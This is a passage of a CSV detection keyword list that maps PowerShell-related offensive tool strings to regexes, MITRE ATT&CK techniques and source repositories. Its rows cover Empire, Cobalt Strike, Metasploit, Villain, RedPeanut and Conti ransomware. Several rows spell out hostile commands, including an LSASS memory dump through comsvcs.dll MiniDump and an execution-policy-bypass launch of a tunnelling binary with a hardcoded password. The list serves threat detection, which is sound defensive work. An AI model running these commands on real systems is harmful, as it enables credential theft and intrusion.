that leverages WMI to both perform actions against targeted machines.
but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*powershell.exe -enc $B64ServerScript*",".{0,1000}powershell\.exe\s\-enc\s\$B64ServerScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sipconfig\s\/all.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #8","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass ps lsass*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sps\slsass.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #11","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - 
TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass quser*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\squser.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #10","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass rundll32.exe C:\windows\System32\comsvcs.dll* MiniDump * C:\programdata\a.zip full*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\srundll32\.exe\sC\:\\windows\\System32\\comsvcs\.dll.{0,1000}\sMiniDump\s.{0,1000}\sC\:\\programdata\\a\.zip\sfull.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #13","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass Start-Process c:\windows\SVN.exe -ArgumentList *-connect * -pass 
Password1234*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sStart\-Process\sc\:\\windows\\SVN\.exe\s\-ArgumentList\s.{0,1000}\-connect\s.{0,1000}\s\-pass\sPassword1234.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #12","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -NoP -sta -NonI -W Hidden -Command *Action = New-ScheduledTaskAction -Execute *",".{0,1000}powershell\.exe\s\-NoP\s\-sta\s\-NonI\s\-W\sHidden\s\-Command\s.{0,1000}Action\s\=\sNew\-ScheduledTaskAction\s\-Execute\s.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*powershell.exe nothing to see here! 
:-P*",".{0,1000}powershell\.exe\snothing\sto\ssee\shere!\s\:\-P.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*powershell_code_execution_invoke_assembly*",".{0,1000}powershell_code_execution_invoke_assembly.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_collection_keylogger*",".{0,1000}powershell_collection_keylogger.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red 
Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_collection_screenshot*",".{0,1000}powershell_collection_screenshot.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - 
T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_command_x64.ps1*",".{0,1000}powershell_command_x64\.ps1.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*powershell_command_x86.ps1*",".{0,1000}powershell_command_x86\.ps1.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*powershell_credentials_tokens*",".{0,1000}powershell_credentials_tokens.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - 
T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_encode_oneliner*",".{0,1000}powershell_encode_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*powershell_encode_oneliner*",".{0,1000}powershell_encode_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell_encode_stager*",".{0,1000}powershell_encode_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*powershell_encode_stager*",".{0,1000}powershell_encode_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell_management_psinject*",".{0,1000}powershell_management_psinject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_management_spawn*",".{0,1000}powershell_management_spawn.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - 
T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*PowerShell_PoC.zip*",".{0,1000}PowerShell_PoC\.zip.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*powershell_privesc_bypassuac_eventvwr*",".{0,1000}powershell_privesc_bypassuac_eventvwr.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_privesc_sherlock*",".{0,1000}powershell_privesc_sherlock.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - 
T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_reflective_mimikatz*",".{0,1000}powershell_reflective_mimikatz.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*powershell_reverse_shell.ps1*",".{0,1000}powershell_reverse_shell\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*powershell_reverse_tcp.*",".{0,1000}powershell_reverse_tcp\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*powershell_reverse_tcp.py*",".{0,1000}powershell_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*powershell_reverse_tcp_v2.py*",".{0,1000}powershell_reverse_tcp_v2\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*powershell-admin-download-execute.ino*",".{0,1000}powershell\-admin\-download\-execute\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device (HID attacks). 
Penetration With Teensy","T1025 - T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*PowershellAgentGenerator.*",".{0,1000}PowershellAgentGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PowershellAmsiGenerator*",".{0,1000}PowershellAmsiGenerator.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 